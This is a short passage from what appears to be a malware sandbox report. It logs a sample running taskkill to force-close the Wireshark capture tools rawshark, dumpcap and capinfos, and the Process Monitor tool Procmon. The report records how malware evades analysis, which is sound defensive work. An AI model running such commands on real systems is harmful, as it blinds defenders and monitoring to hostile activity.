C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1384
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:2016
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:1628
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:1876
-